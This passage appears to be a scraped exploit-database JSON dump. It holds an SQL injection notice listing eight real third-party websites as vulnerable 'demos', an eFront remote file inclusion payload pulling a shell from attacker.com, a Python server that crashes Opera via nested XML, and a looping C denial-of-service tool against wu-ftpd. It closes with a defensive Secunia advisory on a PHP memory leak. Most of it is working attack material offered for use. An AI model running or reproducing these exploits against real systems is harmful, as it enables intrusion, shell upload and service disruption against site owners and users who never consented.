http://www.antemene.com\r\n\r\n\r\n########################################################################################\r\n\r\nProof:\r\n127.0.0.1/article.php?id=[SQLi]\r\n127.0.0.1/article.php?id_categorie=&id_article[SQLi]\r\n\r\nDemos:\r\nhttp://www.destination-piscine.com/m_catalogue/article.php?id=4'\r\nhttp://www.domaine-usseglio.fr/m_vin/article.php?id_categorie=&id_article=3'\r\nhttp://www.vins-saint-saturnin.com/m_vin/article.php?id_categorie=3&id_article=39'\r\nhttp://www.costieres.com/m_vin/article.php?id_categorie=2&id_article=26'\r\nhttp://www.cave-vauvert.com/m_vin/article.php?id_categorie=2&id_article=6'\r\nhttp://www.vignerons-castelas.com/m_vin/article.php?id_categorie=&id_article=13'\r\nhttp://www.bulbargence.com/m_catalogue/article.php?id_categorie=89&id_article=48'\r\nhttp://www.sasvp.com/m_catalogue/article.php?id_categorie=14&id_article=11'\r\n\r\nMore in Google =)\r\n\r\n########################################################################################\r\nGreets to: TN H4CK3RZ , r00tw0rm members and Inj3ct0r Team\r\n###########################################################################################\r\n\r\n\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19383"}, 
{"lastseen": "2018-01-04T15:02:43", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-09-15T00:00:00", "published": "2009-09-15T00:00:00", "id": "1337DAY-ID-5768", "href": "https://0day.today/exploit/description/5768", "type": "zdt", "title": "efront <= 3.5.4 (database.php path) Remote File Inclusion Vulnerability", "sourceData": "=======================================================================\r\nefront <= 3.5.4 (database.php path) Remote File Inclusion Vulnerability\r\n=======================================================================\r\n\r\n\r\n########################################################################\r\n#efront <= 3.5.4 Remote File Include Vulnerability\r\n#Download Script : http://sourceforge.net/projects/efrontlearning/files/\r\n#Author : cr4wl3r \r\n#Location : Gorontalo - INDONESIA\r\n########################################################################\r\n#file :\r\n# database.php \r\n#line 15 require_once($path.'adodb/adodb.inc.php');\r\n########################################################################\r\n#3xplo!t :\r\n#http://target.com/[path]/libraries/database.php?path=http://attacker.com/shell.txt??? 
\r\n########################################################################\r\n#sekuritionline.net (all crew sekuritionline)\r\n#manadocoding.net (all crew manadocoding)\r\n########################################################################\r\n\r\n\r\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5768"}, {"lastseen": "2018-04-10T01:46:11", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2009-03-30T00:00:00", "published": "2009-03-30T00:00:00", "id": "1337DAY-ID-6796", "href": "https://0day.today/exploit/description/6796", "type": "zdt", "title": "Opera 9.64 (7400 nested elements) XML Parsing Remote Crash Exploit", "sourceData": "==================================================================\r\nOpera 9.64 (7400 nested elements) XML Parsing Remote Crash Exploit\r\n==================================================================\r\n\r\n\r\n#\r\n# Author : Ahmed Obied ([email\u00a0protected])\r\n#\r\n#\r\n# - Tested using the latest version of Opera (9.64)\r\n#\r\n# Usage : python opera.py [port]\r\n# \r\n\r\nimport sys, socket\r\nfrom BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler\r\n\r\nclass RequestHandler(BaseHTTPRequestHandler):\r\n \r\n def get_exploit(self):\r\n exploit = '<A>' * 7400\r\n exploit = '<xml>' + exploit + '</xml>'\r\n return exploit\r\n \r\n def log_request(self, *args, **kwargs):\r\n pass\r\n\r\n def do_GET(self):\r\n if self.path == '/':\r\n print\r\n print '[-] Incoming connection from %s' % self.client_address[0]\r\n print '[-] Sending header to %s ...' % self.client_address[0]\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/xml')\r\n self.end_headers()\r\n print '[-] Header sent to %s' % self.client_address[0]\r\n print '[-] Sending exploit to %s ...' 
% self.client_address[0]\r\n self.wfile.write(self.get_exploit())\r\n print '[-] Exploit sent to %s' % self.client_address[0]\r\n\r\ndef main():\r\n if len(sys.argv) != 2:\r\n print 'Usage: %s [port]' % sys.argv[0]\r\n sys.exit(1)\r\n try:\r\n port = int(sys.argv[1])\r\n if port < 1 or port > 65535:\r\n raise ValueError\r\n try:\r\n serv = HTTPServer(('', port), RequestHandler)\r\n ip = socket.gethostbyname(socket.gethostname())\r\n print '[-] Web server is running at http://%s:%d/' % (ip, port)\r\n try:\r\n serv.serve_forever()\r\n except KeyboardInterrupt:\r\n print '[-] Exiting ...' \r\n except socket.error:\r\n print '[*] ERROR: a socket error has occurred ...'\r\n sys.exit(-1) \r\n except ValueError:\r\n print '[*] ERROR: invalid port number ...'\r\n sys.exit(-1)\r\n \r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n\n# 0day.today [2018-04-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6796"}, {"lastseen": "2018-01-02T21:07:30", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2005-02-25T00:00:00", "published": "2005-02-25T00:00:00", "id": "1337DAY-ID-5956", "href": "https://0day.today/exploit/description/5956", "type": "zdt", "title": "wu-ftpd <= 2.6.2 File Globbing Denial of Service Exploit", "sourceData": "========================================================\r\nwu-ftpd <= 2.6.2 File Globbing Denial of Service Exploit\r\n========================================================\r\n\r\n\r\n\r\n/*\r\n * wu-ftpd <= 2.6.2 File Globbing DoS \r\n * [email\u00a0protected]\r\n * \r\n * Advisory: http://www.idefense.com/application/poi/display?id=207&type=vulnerabilities&flashstatus=true\r\n *\r\n * Adam Zabrocki (pi3 / pi3ki31ny) is credited with this discovery.\r\n */\r\n\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n\r\n#define 
SERVER_PORT 21\r\nusage(char *name)\r\n{\r\nprintf(\"usage: %s -h hostname/ip -u user -p passwd\\n\",name);\r\nprintf(\"\\t\\t/str0ke!milw0rm.com wu-ftpd <= 2.6.2 File Globbing DoS\\n\");\r\nexit(0);\r\n}\r\n\r\nmain(int argc, char *argv[]) {\r\n char buffer[1000],host[255],user[255],pass[255],c;\r\n int sd, rc, i=0;\r\n struct sockaddr_in localAddr, servAddr;\r\n struct hostent *h;\r\n\r\nif ( argc < 3) {\r\nusage(argv[0]);\r\n}\r\n\r\nwhile ((c = getopt (argc, argv, \"h:u:p:\")) != EOF)\r\n switch(c)\r\n {\r\n case 'h':\r\n strncpy(host,optarg,sizeof(host));\r\n break;\r\n case 'u':\r\n strncpy(user,optarg,sizeof(user));\r\n break;\r\n case 'p':\r\n strncpy(pass,optarg,sizeof(pass));\r\n break;\r\n }\r\n\r\nwhile(1) {\r\n\r\n h = gethostbyname(host);\r\n if(h==NULL) {\r\n printf(\"unknown host '%s'\\n\",host);\r\n exit(1);\r\n }\r\n\r\n servAddr.sin_family = h->h_addrtype;\r\n memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);\r\n servAddr.sin_port = htons(SERVER_PORT);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd<0) {\r\n perror(\"cannot open socket \");\r\n exit(1);\r\n }\r\n\r\n localAddr.sin_family = AF_INET;\r\n localAddr.sin_addr.s_addr = htonl(INADDR_ANY);\r\n localAddr.sin_port = htons(0);\r\n\r\n rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr));\r\n if(rc<0) {\r\n printf(\"%d: cannot bind port TCP %u\\n\",sd,SERVER_PORT);\r\n perror(\"error \");\r\n exit(1);\r\n }\r\n\r\n printf(\"Trying To Connect To [%s]\\n\",host);\r\n rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));\r\n if(rc<0) {\r\n perror(\"cannot connect \");\r\n exit(1);\r\n }\r\n printf(\"Trying Login With [%s]\\n\",user);\r\n snprintf(buffer,sizeof(buffer), \"USER %s\\r\\n\", user);\r\n rc = send(sd, buffer, strlen(buffer), 0);\r\n memset(buffer,0,sizeof(buffer));\r\n\r\nwhile(1)\r\n {\r\n rc=recv(sd,buffer,sizeof(buffer),0);\r\n if(strstr(buffer,\"331\")) break;\r\n if(strstr(buffer,\"421\"))\r\n {\r\n printf(\"Access Denied on 
your arse..\\n\");\r\n exit(0);\r\n }\r\n }\r\n\r\n printf(\"Sending Pass - [%s]\\n\",pass);\r\n memset(buffer,0,sizeof(buffer));\r\n snprintf(buffer,sizeof(buffer), \"PASS %s\\r\\n\", pass);\r\n rc = send(sd,buffer, strlen(buffer), 0);\r\n\r\nwhile(1)\r\n {\r\n rc=recv(sd,buffer,sizeof(buffer),0);\r\n if(strstr(buffer,\"230\")) break;\r\n if(strstr(buffer,\"421\"))\r\n {\r\n printf(\"Access Denied on your arse..\\n\");\r\n exit(0);\r\n }\r\n\r\n if(strstr(buffer,\"530\"))\r\n {\r\n printf(\"Access Denied: Login Incorrect!\\n\");\r\n exit(0);\r\n }\r\n}\r\n\r\n memset(buffer,0,sizeof(buffer));\r\n snprintf(buffer,sizeof(buffer), \"LIST ***********************************************************************************************************************************************************************************************.*\\r\\n\");\r\n rc = send(sd,buffer, strlen(buffer), 0);\r\n printf(\"Dos Sent\\n\");\r\n\r\n}\r\n\r\n if(rc<0) {\r\n perror(\"cannot send data \");\r\n close(sd);\r\n exit(1);\r\n }\r\nreturn 0;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5956"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nPHP "html_entity_decode()" Information Disclosure Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA19383\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/19383/\r\n\r\nCRITICAL:\r\nLess critical\r\n\r\nIMPACT:\r\nExposure of sensitive information\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nPHP 4.3.x\r\nhttp://secunia.com/product/922/\r\nPHP 4.4.x\r\nhttp://secunia.com/product/5768/\r\nPHP 5.0.x\r\nhttp://secunia.com/product/3919/\r\nPHP 5.1.x\r\nhttp://secunia.com/product/6796/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been discovered in PHP, which can be exploited by\r\nmalicious people to gain knowledge of potentially sensitive\r\ninformation.\r\n\r\nThe vulnerability is caused due to the 
"html_entity_decode()" PHP\r\nfunction not being binary safe. This can be exploited to disclose\r\ncertain parts of memory via a script calling the\r\n"html_entity_decode()" function with input controlled by the attacker\r\nand where the result is sent to the attacker.\r\n\r\nSuccessful exploitation may allow disclosure of e.g. passwords stored in a PHP\r\nscript.\r\n\r\nThe vulnerability has been confirmed in versions 4.4.2 and 5.1.2.\r\nPrior versions may also be affected.\r\n\r\nSOLUTION:\r\nThe vulnerability has been fixed in the CVS repository and in version\r\n5.1.3-RC1.\r\n\r\nDo not call the "html_entity_decode()" function in PHP scripts where\r\nthe input originates from untrusted sources.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nDiscovered by the vendor and reported to public mailing lists by T\u00f5nu\r\nSamuel.\r\n\r\nORIGINAL ADVISORY:\r\nT\u00f5nu Samuel:\r\nhttp://archives.neohapsis.com/archives/fulldisclosure/2006-03/1675.html\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-03-29T00:00:00", "published": "2006-03-29T00:00:00", "id": "SECURITYVULNS:DOC:12022", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12022", "title": "[SA19383] PHP "html_entity_decode()" Information Disclosure Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 
"2018-08-31T11:09:20", "bulletinFamily": "software", "description": "Invalid processing of non-printable characters allows access to memory content.", "modified": "2006-03-29T00:00:00", "published": "2006-03-29T00:00:00", "id": "SECURITYVULNS:VULN:5956", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5956", "title": "PHP html_entity_decode() information leak", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}